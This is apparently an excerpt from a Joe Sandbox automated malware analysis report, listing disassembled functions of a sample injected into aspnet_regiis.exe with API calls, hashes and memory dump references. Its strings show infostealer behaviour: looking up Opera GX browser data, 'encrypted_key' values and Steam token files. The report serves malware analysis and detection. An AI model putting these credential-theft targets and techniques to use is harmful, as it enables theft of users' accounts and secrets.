                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1065093856-0
                                                                                                                                                                    • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                    • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                                                                    • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                                                                    Function 6C793060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C793095
                                                                                                                                                                      • Part of subcall function 6C7935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C81F688,00001000), ref: 6C7935D5
                                                                                                                                                                      • Part of subcall function 6C7935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7935E0
                                                                                                                                                                      • Part of subcall function 6C7935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7935FD
                                                                                                                                                                      • Part of subcall function 6C7935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C79363F
                                                                                                                                                                      • Part of subcall function 6C7935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C79369F
                                                                                                                                                                      • Part of subcall function 6C7935A0: __aulldiv.LIBCMT ref: 6C7936E4
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C79309F
                                                                                                                                                                      • Part of subcall function 6C7B5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B85
                                                                                                                                                                      • Part of subcall function 6C7B5B50: EnterCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5B90
                                                                                                                                                                      • Part of subcall function 6C7B5B50: LeaveCriticalSection.KERNEL32(6C81F688,?,?,?,6C7B56EE,?,00000001), ref: 6C7B5BD8
                                                                                                                                                                      • Part of subcall function 6C7B5B50: GetTickCount64.KERNEL32 ref: 6C7B5BE4
                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7930BE
                                                                                                                                                                      • Part of subcall function 6C7930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C793127
                                                                                                                                                                      • Part of subcall function 6C7930F0: __aulldiv.LIBCMT ref: 6C793140
                                                                                                                                                                      • Part of subcall function 6C7CAB2A: __onexit.LIBCMT ref: 6C7CAB30
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                    • Opcode ID: 121ad497222ad1bbd0cea3e8e4e0f67320c821fef7417ceffcaa9dd7d6432249
                                                                                                                                                                    • Instruction ID: 2bc036f856198b45bcfcac470dd91f38975197bde8e80b84b264487478041588
                                                                                                                                                                    • Opcode Fuzzy Hash: 121ad497222ad1bbd0cea3e8e4e0f67320c821fef7417ceffcaa9dd7d6432249
                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0D632E2074A96CA20DF3499861A673B4AF7B218F101329E85963A21FB2065D8C3C2
                                                                                                                                                                    Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4203777966-0
                                                                                                                                                                    • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                    • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                                                                                                                    Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                                      • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                    • String ID: Opera GX
                                                                                                                                                                    • API String ID: 1719890681-3280151751
                                                                                                                                                                    • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                    • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                                                                                                    • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                                                                                                    Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 544645111-3916222277
                                                                                                                                                                    • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                    • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                                                                                                    • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                                                                                                    • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                                                                                                    Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                                                                                                      • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                                                                      • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                    • API String ID: 502913869-3507145866
                                                                                                                                                                    • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                    • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                                                                                                    • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                                                                                                    • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                                                                                                    Function 00411E1F Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                    • String ID: 1iA
                                                                                                                                                                    • API String ID: 3494564517-1863120733
                                                                                                                                                                    • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                    • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                                                                                                    • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                                                                                                    Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                    • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                                    • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                                    • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                                    Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                                      • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                                      • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                                      • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                                    • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2974738957-0
                                                                                                                                                                    • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                    • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                                                                    • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                                    • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                                                                    Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
